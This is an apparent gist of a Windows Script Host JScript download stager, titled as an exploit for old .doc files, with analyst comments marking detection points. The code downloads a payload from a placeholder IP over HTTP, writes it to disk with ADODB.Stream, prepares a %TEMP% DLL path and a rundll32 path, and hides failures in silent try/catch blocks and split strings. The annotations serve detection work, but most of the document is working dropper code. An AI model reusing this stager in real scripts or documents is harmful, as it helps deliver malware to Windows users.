@ivanvza
Created February 28, 2017 20:30
Simple JS exploit used in the old .doc style
// Analyst notes (defensive annotation of a WSH/JScript download stager as posted).
// The script runs under the Windows Script Host: it resolves a drop path in %TEMP%,
// picks a rundll32.exe path by architecture, fetches each URL below over HTTP and
// writes the raw response body to disk via ADODB.Stream. Every step that could fail
// is wrapped in try/catch that silently moves on, so a host sees no error output.
// Several strings are built by concatenation ("%T" + "EMP%", ".d" + "ll"); content
// signatures should match the resolved values, not the literal fragments.

// Download source(s); "<IP HERE>" is the author's placeholder, not a live indicator.
urls = ["http://<IP HERE>"]
// COM objects are created through WScript["CreateObject"] (bracket syntax) rather than
// `new ActiveXObject(...)` for most of the script; both resolve to the same ProgIDs.
var wscript = WScript["CreateObject"]("WScript.Shell");
// Resolves to the user's %TEMP% directory with a trailing "/".
var wscript_env = wscript.ExpandEnvironmentStrings("%T" + "EMP%/");
// Drop path artifact to hunt for: %TEMP%\jEiwaeU3NSUv.dll (fixed, not random per run).
var dll = wscript_env + "jEiwaeU3NSUv";
var dll_filename = dll + ".d" + "ll";
// Reads the *System* environment block (not the process one) for the CPU architecture.
var system_arch = wscript.Environment("System");
if (system_arch("PROCESSOR_ARCHITECTURE").toLowerCase() == "amd64") {
// On 64-bit hosts the 32-bit rundll32 under SysWOW64 is selected; on others, system32.
// Nothing in this listing references rundll_arch_patch after it is assigned.
var rundll_arch_patch = wscript.ExpandEnvironmentStrings("%SystemRoot%\\SysWOW64\\rundll32.exe");
}
else {
var rundll_arch_patch = wscript.ExpandEnvironmentStrings("%SystemRoot%\\system32\\rundll32.exe");
}
// Two HTTP client ProgIDs are tried in order; the first that instantiates is kept.
// Telemetry: wscript.exe/cscript.exe loading MSXML2.XMLHTTP or WinHttpRequest is a
// useful detection pivot for this family of stagers.
var xmlhttp_package = ["MSXML2.XMLHTTP", "WinHttp.WinHttpRequest.5.1"];
for (var total_urls = 0; total_urls < xmlhttp_package["length"]; total_urls++) {
try {
var downloader = WScript["CreateObject"](xmlhttp_package[total_urls]);
break;
} catch (e) {
// Instantiation failure is swallowed; if both ProgIDs fail, `downloader` stays
// undefined and the later calls throw inside the per-URL try/catch below.
continue;
}
};
var file_writer = new ActiveXObject("Scripting.FileSystemObject");
// One attempt per URL; any exception (network, COM, file) skips to the next URL.
for (var total_urls2 = 0; total_urls2 < urls.length; total_urls2 = total_urls2 + 1) {
try {
// Synchronous GET (third argument false), then a busy-wait on readyState anyway.
downloader["open"]("GET", urls[total_urls2], false);
downloader["send"]();
while (downloader.readystate < 4) WScript["Sleep"](100);
// ADODB.Stream in binary mode (type 1) is the classic WSH "write bytes to disk" path;
// ADODB.Stream creation from a script host is itself a detection signal.
var writer = WScript["CreateObject"]("ADODB.Stream");
writer["open"]();
writer["type"] = 1;
writer["write"](downloader["ResponseBody"]);
writer["position"] = 0;
// SaveToFile option 2 overwrites an existing file. The target is the literal name
// "file", resolved against the script host's current working directory.
writer["SaveToFile"]("file", 2);
writer["close"]();
// Looks up the %TEMP% .dll path computed above and takes its 8.3 short path;
// GetFile throws if that path does not exist, which lands in the catch below.
var downloaded_file = file_writer.GetFile(dll_filename);
var downloaded_file_name = downloaded_file.ShortPath;
} catch (e) {
continue;
}
}